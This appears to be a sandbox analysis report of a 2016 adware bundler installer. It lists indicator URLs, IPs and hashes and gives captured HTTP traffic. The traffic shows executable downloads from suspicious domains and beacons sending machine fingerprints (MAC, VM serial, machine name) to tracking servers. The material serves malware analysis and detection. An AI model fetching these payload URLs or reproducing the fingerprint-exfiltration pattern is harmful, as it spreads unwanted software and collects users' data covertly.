e47b3680df663a409ff27e7892659d6a
5094e2b5502bb3eb161183ccdd26bee5
d8616b984b03d23f2ddad2ace1e6fcc9
bb3461f9ff7218951e59c6c7d5e18f65
f6794b812107e8db90b8a9adbc3a19d6
babe8174d9e14bddc4572ed8fc3fef02
0c153ff4df276bb5694854186f48e695
Network Activity
URLs
URL | IP |
---|---|
hxxp://52.222.174.245/get.php?ses=429155916441231936 | |
hxxp://ee.ilentialnessme.bid/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=117&aff_sub2=151377&aff_sub3=&aff_sub4=&aff_sub5=1399165537&url=http://ee.ilentialnessme.bid/offer.php?affId={aff_id}&trackingId=135176390&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 | 54.88.21.193 |
hxxp://win.ketydesmidiana.bid/aff_c?offer_id=4&aff_id=2291&source=2180&aff_sub=0&aff_sub2=0&aff_sub3=&aff_sub4=&aff_sub5=0&url=http://ee.ilentialnessme.bid/offer.php?affId={aff_id}&trackingId=135176390&instId=2180&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 | 54.246.201.113 |
hxxp://ee.ilentialnessme.bid/offer.php?affId=2291&trackingId=135176390&instId=2180&ho_trackingid=1022cfb36461ebc8195bc69760cdf1&cc=UA&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 | 54.88.21.193 |
hxxp://ee.ilentialnessme.bid/installer.php?affId=2291&instId=2180&ho_trackingid=1022cfb36461ebc8195bc69760cdf1&trackingId=135176390&cc=UA&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 | 54.88.21.193 |
hxxp://d2adi7hu49xk5t.cloudfront.net/appImg.jpg | 52.222.174.190 |
hxxp://d2adi7hu49xk5t.cloudfront.net/normal_bg.jpg | 52.222.174.190 |
hxxp://ee.ilentialnessme.bid/report.php?typ=sys&affId=1006&instId=11&ho_transId=1022cfb36461ebc8195bc69760cdf1&transId=135176390&chk_s_b=VMware-56 4d 22 96 65 fe b6 85-36 78 73 8e 10 74 4e 8c&chk_s_v=HPQOEM - 6040000&chk_c_ma=VMware, Inc.&chk_c_mo=VMware Virtual Platform&chk_mac=00:50:56:33:B5:51&randid=0.44531263149565414 | 54.88.21.193 |
hxxp://ee.ilentialnessme.bid/report.php?typ=conversion&transId=135176390&affId=1006&instId=11&ho_transId=1022cfb36461ebc8195bc69760cdf1&s1=117&s2=151377&s3=&s4=&s5=1399165537&cid=5c12d1104cca24294ae7d8d45ce8d028&uac=true&randid=0.3799597195784592 | 54.88.21.193 |
hxxp://d1gahxamcuu9d3.cloudfront.net/stub_maker_uk2.php?url=hxxp://gurusetman.info/taveara?q=setup&name=Installation | |
hxxp://gurusetman.info/taveara?q=setup | 104.18.40.31 |
hxxp://greates.info/?ad=2&ver=1&sid=8251&url=http://aclick.adhoc2.net/9AqV-Sgf7ELvPEipl_Cbxm?tt=2&var1=&var2=&var3=9999&name=setup&type=setup&size=3145728&sub_id=346&sub_id2=Kt86-ZfR0bKuZsB7kP3NNhupjIn3i4ti9tLLSX3ap6d1wZXY2bMx_MzcZD4ka-au6b9eF9GlKWFnnbgrmIpGWgtbX_Ngr0gZZWB5Fq21jfakgCiJWr | 104.27.151.43 |
hxxp://oblo.raidedsentry.ru/0nIydlSpN0ZrFmZqFjMxZUNCdlWadGMydmTfhlY0d2VHBXStJ3Zi5mbGd1SsdUOGVWOiZTdh1SYrRDRaNmeN9FeNJmMZhlW3FDZ2AXYzg1UMxEd5kGd0k2MulkawVHaO50MQt2NCNnW1tkYwIlZa1iN4Q3SiojIyQWafJWdzJCLiYDNzIiOiQWafJWdzJCLigjM3UDNxMjI6ISZ6l2ciwiIwVHdlNnI6ISZwlHdiwiIwVHdlNnI6ISZtFmbiwiI5kTO50zMyFmdm0jMyFmdm0TMyFmdmITP0R3PthnYD9FbwlWRQZHTFdjZnNVLWFXQ58CX0VmbuIzYvhGZh5yajlGbjF2Lc9CX6AHd0hmI6ICbyVnIsISM1IDOiojIkl2ciwiIxIiOiIXZ2Jye | |
hxxp://dualstack.ils-front-balancer3-264552681.us-east-1.elb.amazonaws/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png | |
hxxp://dualstack.ils-front-balancer3-264552681.us-east-1.elb.amazonaws/index.php | |
hxxp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/typ_1.html | 52.222.174.240 |
hxxp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/css/style.css | 52.222.174.240 |
hxxp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/img/icon1-green.png | 52.222.174.240 |
hxxp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/img/icon2-green.png | 52.222.174.240 |
hxxp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/img/icon3-green.png | 52.222.174.240 |
hxxp://n135adserv.com/js/show_ads_supp.js?pubId=907 | |
hxxp://ic-dc.deliverydlcenter.com/favicon.ico | 52.222.174.240 |
hxxp://ee.ilentialnessme.bidhxxp://ee.ilentialnessme.bid/installer.php?affId=2291&instId=2180&ho_trackingid=1022cfb36461ebc8195bc69760cdf1&trackingId=135176390&cc=UA&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 | 54.88.21.193 |
hxxp://www.1-1ads.com/js/show_ads_supp.js?pubId=907 | 212.124.124.178 |
hxxp://ee.ilentialnessme.bidhxxp://ee.ilentialnessme.bid/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=117&aff_sub2=151377&aff_sub3=&aff_sub4=&aff_sub5=1399165537&url=http://ee.ilentialnessme.bid/offer.php?affId={aff_id}&trackingId=135176390&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 | 54.88.21.193 |
hxxp://away.yosauruslega.bid/get.php?ses=429155916441231936 | |
hxxp://www.dosecuretrips.com/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png | 107.20.147.93 |
hxxp://ee.ilentialnessme.bidhxxp://ee.ilentialnessme.bid/offer.php?affId=2291&trackingId=135176390&instId=2180&ho_trackingid=1022cfb36461ebc8195bc69760cdf1&cc=UA&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 | 54.88.21.193 |
hxxp://wet.sodcattilyrem.bid/stub_maker_uk2.php?url=hxxp://gurusetman.info/taveara?q=setup&name=Installation | 52.222.174.135 |
hxxp://www.selfdislikedfarfet.site/index.php | 107.20.147.93 |
hxxp://win.ketydesmidiana.bidhxxp://win.ketydesmidiana.bid/aff_c?offer_id=4&aff_id=2291&source=2180&aff_sub=0&aff_sub2=0&aff_sub3=&aff_sub4=&aff_sub5=0&url=http://ee.ilentialnessme.bid/offer.php?affId={aff_id}&trackingId=135176390&instId=2180&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 | 54.246.201.113 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/css/style.css HTTP/1.1
Accept: text/css
Referer: hXXp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/typ_1.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ic-dc.deliverydlcenter.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: text/css
Content-Length: 1967
Connection: keep-alive
Date: Mon, 10 Oct 2016 08:52:43 GMT
Last-Modified: Fri, 07 Oct 2016 08:02:49 GMT
ETag: "92657668b4257695bd2699a787aee60b"
Accept-Ranges: bytes
Server: AmazonS3
Age: 64444
X-Cache: Hit from cloudfront
Via: 1.1 e7ce333c56f455a0dae7f1f5ea5d6086.cloudfront.net (CloudFront)
X-Amz-Cf-Id: fhHJWlc0aTPvIif0TAxqMwP162bjl_kkLruNbHh_EQJHE-Lfs25efg==
body {
  margin: 0;
  padding: 0;
  font-family: Helvetica, Arial, sans-serif;
}

h1 {
  margin: 0;
  font-size: 28px;
  font-weight: normal;
  text-align: center;
  color: #333;
}

.container {
  margin: 0 auto;
  width: 980px;
  padding-left: 20px;
  padding-right: 20px;
}

.header h1.typ {
  line-height: 80px;
  padding-top: 0;
}

.header h1 {
  padding-top: 13px;
}

.header h1 span {
  display: block;
  font-size: 14px;
}

.header-top, .header-bottom {
  position: relative;
  height: 80px;
  width: 100%;
}

.header-top.green {
  background: #22B573;
}

.header-top.blue {
  background: #0461C9;
}

.header-bottom.grey {
  background: #CCCCCC;
}

.header-bottom.light-blue {
  background: #B6D2F2;
  border-bottom: 1px solid #02294C;
}

#widget {
  margin: 0 auto;
  margin-top: 50px;
  margin-bottom: 150px;
}

.footer {
  position: relative;
  width: 100%;
  height: 216px;
  background: #e5e5e5;
  border-top: 1px solid #fff;
  -webkit-box-sizing: border-box;
  -moz-box-sizing: border-box;
  box-sizing: border-box;
}

.footer:before {
  position: absolute;
  left: 0;
  right: 0;
  top: -2px;
  height: 1px;
  width: 100%;
  content: '';
}

.footer.green:before {
  background: #0F4C2E;
}

.footer.blue:before {
  background: #02294C;
}

.footer h3 {
  margin-top: 38px;
  margin-bottom: 28px;
  font-size: 18px;
  text-align: center;
  text-shadow: -1px 1px 0 #fff;
}

.footer h3.green {
  color: #22B573;
}

.footer h3.blue {
  color: #0461C9;
}

ul.steps {
  margin: 0;
  padding: 0;
  list-style-type: none;
}

ul.st
<<< skipped >>>
GET /?ad=2&ver=1&sid=8251&url=http://aclick.adhoc2.net/9AqV-Sgf7ELvPEipl_Cbxm?tt=2&var1=&var2=&var3=9999&name=setup&type=setup&size=3145728&sub_id=346&sub_id2=Kt86-ZfR0bKuZsB7kP3NNhupjIn3i4ti9tLLSX3ap6d1wZXY2bMx_MzcZD4ka-au6b9eF9GlKWFnnbgrmIpGWgtbX_Ngr0gZZWB5Fq21jfakgCiJWr HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
Host: greates.info
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Moved Temporarily
Date: Sun, 13 Nov 2016 05:19:19 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d173566d0828d0aa2e2d9476f9244ccef1479014359; expires=Mon, 13-Nov-17 05:19:19 GMT; path=/; domain=.greates.info; HttpOnly
X-Powered-By: PHP/5.4.16
Location: hXXp://oblo.raidedsentry.ru/0nIydlSpN0ZrFmZqFjMxZUNCdlWadGMydmTfhlY0d2VHBXStJ3Zi5mbGd1SsdUOGVWOiZTdh1SYrRDRaNmeN9FeNJmMZhlW3FDZ2AXYzg1UMxEd5kGd0k2MulkawVHaO50MQt2NCNnW1tkYwIlZa1iN4Q3SiojIyQWafJWdzJCLiYDNzIiOiQWafJWdzJCLigjM3UDNxMjI6ISZ6l2ciwiIwVHdlNnI6ISZwlHdiwiIwVHdlNnI6ISZtFmbiwiI5kTO50zMyFmdm0jMyFmdm0TMyFmdmITP0R3PthnYD9FbwlWRQZHTFdjZnNVLWFXQ58CX0VmbuIzYvhGZh5yajlGbjF2Lc9CX6AHd0hmI6ICbyVnIsISM1IDOiojIkl2ciwiIxIiOiIXZ2Jye
Server: cloudflare-nginx
CF-RAY: 300fc4a1f37f2902-OTP
<<< skipped >>>
POST /index.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: VVV.selfdislikedfarfet.site
Content-Length: 523
Connection: Keep-Alive
Cache-Control: no-cache
Net1.1=&Net2=3.5.30729.5420SP1&Net4=4.5.50709&OSversion=NT6.1SP1&Slv=&Sysid=541B298A93BFE2600111218F9ABFCC32&Sysid1=52D311BE788EE1E500992B8A6A042C2B&X64=N&admin=Y&browser=IE.HTTP&cavp=&chver=54.0.2840.59&cmdl=Setup__2140_il2.exe&dprod=D068E036AD104FFF0E13053E615F8D&dprod4=C275E3FEDEC17C9D31A2BE03568B64&exe=Setup__2140_il2&ffver=49.0.1.6109&lang_DfltUser=0409&mac=MDA1MDU2MzNCNTUxMDAwMAA=&machg=ODhkY2QzOTUtYjA2Mi00NWIzLWE2Y2QtNzlmMzdjMGViYTA4AA==&name=V0lOLVVLMEZGT084M0k2AA==&netfs=3&ts=1479014369&ver=1.1.5.26
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Sun, 13 Nov 2016 05:19:30 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
transfer-encoding: chunked
Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
 <head>
 <meta http-equiv="content-type" content="text/html; charset=UTF-8" />
 <title>DownloadManagerModern</title>
 <script type="text/javascript">
 var g_notCompatibleWithUpdaterComps = ['LootFindKP'];
 var g_postponedComps = ['updater', 'Paltalk', 'SHAREit', 'JinshanDuba', 'UCwebAccelerator', 'UltimateSecurityPackage' , 'TotalSecurity', 'TotalSecurityIN', 'TotalSecurityRU'];
 </script>
 <base href="hXXp://VVV.selfdislikedfarfet.site:80/index.php" />
 <link rel="stylesheet" type="text/css" href="hXXp://cdn2.leadingdownload.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css" />
 <script type="text/javascript" src="hXXp://cdn1.leadingdownload.com/V38/amipb.js"></script>
 <script type="text/javascript">
 var g_r_appimageurl="http:\/\/pe-sixi.com\/img\/icon_installer.png";
 var g_r_appname="installer";
 var g_r_cmdline="\/S";
 var g_amiobj = '', g_ami, g_updb = false, g_close = '1', g_additional_offer_list = '1';
 var g_finish_install_button = '1';
 var g_popup_install_all = '1';
 var g_eula = 'VGhlIGRvd25sb2FkIGFuZCBpbnN0YWxsYXRpb24gcHJvY2VzcyBvZiB0aGlzIGZpbGUgaXMgcnVuIGJ5IEluc3RhbGxQYXRoIEluc3RhbGwgTWFuYWdlci4KQnkgY2xpY2tpbmcgdGhlICJBY2NlcHQiIG9yICJOZXh0IiBidXR0b25zIGJlbG93LCBvciBieSBjb250aW51aW5nIHRoaXMgSW5zdGFsbFBhdGggSW5zdGFsbCBNYW5hZ2VyIGluc3RhbGxhdGlvbiwgb3Igb3R
<<< skipped >>>
GET /0nIydlSpN0ZrFmZqFjMxZUNCdlWadGMydmTfhlY0d2VHBXStJ3Zi5mbGd1SsdUOGVWOiZTdh1SYrRDRaNmeN9FeNJmMZhlW3FDZ2AXYzg1UMxEd5kGd0k2MulkawVHaO50MQt2NCNnW1tkYwIlZa1iN4Q3SiojIyQWafJWdzJCLiYDNzIiOiQWafJWdzJCLigjM3UDNxMjI6ISZ6l2ciwiIwVHdlNnI6ISZwlHdiwiIwVHdlNnI6ISZtFmbiwiI5kTO50zMyFmdm0jMyFmdm0TMyFmdmITP0R3PthnYD9FbwlWRQZHTFdjZnNVLWFXQ58CX0VmbuIzYvhGZh5yajlGbjF2Lc9CX6AHd0hmI6ICbyVnIsISM1IDOiojIkl2ciwiIxIiOiIXZ2Jye HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
Host: oblo.raidedsentry.ru
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Sun, 13 Nov 2016 05:19:19 GMT
Content-Type: application/exe; charset=windows-1251
Content-Length: 4758720
Connection: keep-alive
X-Powered-By: PHP/5.4.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2016 05:19:19 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Disposition: attachment; filename="setup.exe"
Content-Transfer-Encoding: binary
Pragma: public
[binary response body: PE executable, 4758720 bytes declared. The captured prefix shows an MZP DOS stub ("This program must be run under Win32"), sections CODE, DATA, BSS, .idata, .tls, .rdata, .reloc and .rsrc, and type-name strings (Boolean, WideChar, Char, Smallint, Integer, Byte, Word, Cardinal, Int64, Double, Real, Currency, ShortString, WordBool, LongBool, String, WideString, Variant, OleVariant).]
<<< skipped >>>
GET /pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/img/icon1-green.png HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: hXXp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/typ_1.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ic-dc.deliverydlcenter.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: image/png
Content-Length: 3392
Connection: keep-alive
Date: Mon, 10 Oct 2016 08:52:43 GMT
Last-Modified: Fri, 07 Oct 2016 08:02:49 GMT
ETag: "122fe75beae30ff3ea83688e03402879"
Accept-Ranges: bytes
Server: AmazonS3
Age: 64443
X-Cache: Hit from cloudfront
Via: 1.1 d76fac2b5a2f460a1cbffb76189f59ef.cloudfront.net (CloudFront)
X-Amz-Cf-Id: zgILzJjnODf9_u3eKN_YRJY1_4NUoxU3WshC48sfjHLWtnBwAHE_Mg==
[binary response body: PNG image, 3392 bytes declared. The captured prefix shows the IHDR chunk and a tEXt chunk "Software: Adobe ImageReady".]
<<< skipped >>>
GET /normal_bg.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: d2adi7hu49xk5t.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: image/jpeg
Content-Length: 26781
Connection: keep-alive
Date: Thu, 22 Sep 2016 18:01:12 GMT
Last-Modified: Mon, 13 Jun 2016 11:29:07 GMT
ETag: "b5b0ebe137c0293f816eaac3de2b4e51"
Accept-Ranges: bytes
Server: AmazonS3
Age: 39984
X-Cache: Hit from cloudfront
Via: 1.1 8d84df16ba20ff1d2ca3914948494e04.cloudfront.net (CloudFront)
X-Amz-Cf-Id: uBkHd_5RoRqHN9as-QnlhLcpdLg65yUcQ1ooISYFQfMUoHgFEyDRww==
[binary response body: JPEG image, 26781 bytes declared, with Exif and Ducky segments. Embedded XMP packet as captured:]
<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.146729, 2012/05/03-13:40:03 ">
 <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop Elements 12.0 Windows" xmpMM:InstanceID="xmp.iid:889F23E5F49B11E4A1FBA1E3C36AE7EE" xmpMM:DocumentID="xmp.did:889F23E6F49B11E4A1FBA1E3C36AE7EE">
 <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:889F23E3F49B11E4A1FBA1E3C36AE7EE" stRef:documentID="xmp.did:889F23E4F49B11E4A1FBA1E3C36AE7EE"/>
 </rdf:Description>
 </rdf:RDF>
</x:xmpmeta>
<?xpacket end="r"?>
[remainder of the body is JPEG image data]
<<< skipped >>>
GET /appImg.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: d2adi7hu49xk5t.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: image/jpeg
Content-Length: 4628
Connection: keep-alive
Date: Thu, 22 Sep 2016 18:01:12 GMT
Last-Modified: Mon, 13 Jun 2016 11:29:06 GMT
ETag: "ba6c4124ad5d33528fe1d609e6ac1ff0"
Accept-Ranges: bytes
Server: AmazonS3
Age: 39984
X-Cache: Hit from cloudfront
Via: 1.1 bd3e2233bf25337a89461c638cad13b9.cloudfront.net (CloudFront)
X-Amz-Cf-Id: U-EUqNxZUN-BrxOxbK_UDEar3VnABPkQfmkMdNlTHZNm6Mm0Ye_qvA==
[binary response body: JPEG image, 4628 bytes declared, with Exif and Ducky segments. Embedded XMP packet as captured:]
<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.146729, 2012/05/03-13:40:03 ">
 <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop Elements 12.0 Windows" xmpMM:InstanceID="xmp.iid:E39F75D6F49A11E4B7DAEACD8AA72C6E" xmpMM:DocumentID="xmp.did:E39F75D7F49A11E4B7DAEACD8AA72C6E">
 <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:E39F75D4F49A11E4B7DAEACD8AA72C6E" stRef:documentID="xmp.did:E39F75D5F49A11E4B7DAEACD8AA72C6E"/>
 </rdf:Description>
 </rdf:RDF>
</x:xmpmeta>
<?xpacket end="r"?>
[remainder of the body is JPEG image data]
<<< skipped >>>
GET hXXp://win.ketydesmidiana.bid/aff_c?offer_id=4&aff_id=2291&source=2180&aff_sub=0&aff_sub2=0&aff_sub3=&aff_sub4=&aff_sub5=0&url=http://ee.ilentialnessme.bid/offer.php?affId={aff_id}&trackingId=135176390&instId=2180&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 HTTP/1.1
Host: win.ketydesmidiana.bid
Connection: close
Accept: */*
User-Agent: InstallCapital
HTTP/1.1 302 Found
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 13 Nov 2016 05:19:07 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Location: hXXp://ee.ilentialnessme.bid/offer.php?affId=2291&trackingId=135176390&instId=2180&ho_trackingid=1022cfb36461ebc8195bc69760cdf1&cc=UA&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2
P3P: CP="NOI CUR OUR NOR INT"
Pragma: no-cache
Server: nginx/1.7.9
Set-Cookie: enc_aff_session_4=ENC02854-1022cfb36461ebc8195bc69760cdf1-2291-4-0-0-0-0-UA-0-32313830-30-30-_-_-30-194.242.96.226-20161113001907-_-7A6E6C272A16063B3C1716017461103D5562581C522C06645C4244007D0960733C7E091640616B0D16; expires=Tue, 13 Dec 2016 05:19:07 GMT; path=/;
Set-Cookie: ho_mob=eyJtb2JpbGVfY2FycmllciI6Ij8iLCJ1c2VyX2FnZW50IjoiSW5zdGFsbENhcGl0YWwiLCJjb25uZWN0aW9uX3NwZWVkIjoiYnJvYWRiYW5kIn0=; expires=Tue, 08 Oct 2019 15:59:07 GMT; path=/;
tracking_id: 1022cfb36461ebc8195bc69760cdf1
X-Robots-Tag: noindex, nofollow
Content-Length: 453
Connection: Close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="hXXp://ee.ilentialnessme.bid/offer.php?affId=2291&trackingId=135176390&instId=2180&ho_trackingid=1022cfb36461ebc8195bc69760cdf1&cc=UA&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2">here</a>.</p>
</body></html>
<<< skipped >>>
GET /report.php?typ=conversion&transId=135176390&affId=1006&instId=11&ho_transId=1022cfb36461ebc8195bc69760cdf1&s1=117&s2=151377&s3=&s4=&s5=1399165537&cid=5c12d1104cca24294ae7d8d45ce8d028&uac=true&randid=0.3799597195784592 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: InstallCapital
Host: ee.ilentialnessme.bid
HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Sun, 13 Nov 2016 05:18:30 GMT
Content-Length: 0
GET /pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/img/icon2-green.png HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: hXXp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/typ_1.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ic-dc.deliverydlcenter.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: image/png
Content-Length: 3782
Connection: keep-alive
Date: Mon, 10 Oct 2016 08:52:43 GMT
Last-Modified: Fri, 07 Oct 2016 08:02:51 GMT
ETag: "f62071084680ed861fa12c3ea47cb6e1"
Accept-Ranges: bytes
Server: AmazonS3
Age: 64443
X-Cache: Hit from cloudfront
Via: 1.1 3ef066dcf359ad5dbc339df978147194.cloudfront.net (CloudFront)
X-Amz-Cf-Id: pX-9uxJlT7jHPHPa1yz36Uw4GIzmVJmi_A2mcbd77axMEEGJVaJgoQ==
[binary response body: PNG image, 3782 bytes declared. The captured prefix shows the IHDR chunk and a tEXt chunk "Software: Adobe ImageReady".]
<<< skipped >>>
POST hXXp://ee.ilentialnessme.bid/installer.php?affId=2291&instId=2180&ho_trackingid=1022cfb36461ebc8195bc69760cdf1&trackingId=135176390&cc=UA&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 HTTP/1.1
Host: ee.ilentialnessme.bid
Connection: close
Accept: */*
User-Agent: InstallCapital
Content-Type: application/x-www-form-urlencoded
Content-Length: 162
cid=5c12d1104cca24294ae7d8d45ce8d028&uac=1&id[]=2664&id[]=2665&id[]=2666&id[]=2667&id[]=2668&id[]=2669&id[]=2670&id[]=2671&id[]=2672&id[]=2673&id[]=2674&id[]=2675
HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Sun, 13 Nov 2016 05:18:22 GMT
Connection: close
Content-Length: 37480
[binary response body, 37480 bytes declared; the captured prefix shows no recognizable file header.]
<<< skipped >>>
GET /stub_maker_uk2.php?url=hXXp://gurusetman.info/taveara?q=setup&name=Installation HTTP/1.0
Host: wet.sodcattilyrem.bid
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: application/force-download
Content-Length: 60652
Connection: close
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.28
Content-Disposition: attachment; filename="5827498a25abb_ua.exe"
X-Powered-By: ASP.NET
Date: Sat, 12 Nov 2016 16:55:38 GMT
Age: 44593
X-Cache: Hit from cloudfront
Via: 1.1 cd57e6888980d1e458b233b5ef20ee46.cloudfront.net (CloudFront)
X-Amz-Cf-Id: i8UIml3LnG1MKA8CDNO6PQ3HlSVYkDtsv9mUevVxV14GyEXXXEltOw==
[binary response body: PE executable, 60652 bytes declared. The captured prefix shows an MZ DOS stub ("This program cannot be run in DOS mode"), a Rich header, and sections .text, .rdata, .data, .ndata, .rsrc and .reloc.]
<<< skipped >>>
GET /taveara?q=setup HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
Host: gurusetman.info
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 301 Moved Permanently
Date: Sun, 13 Nov 2016 05:19:19 GMT
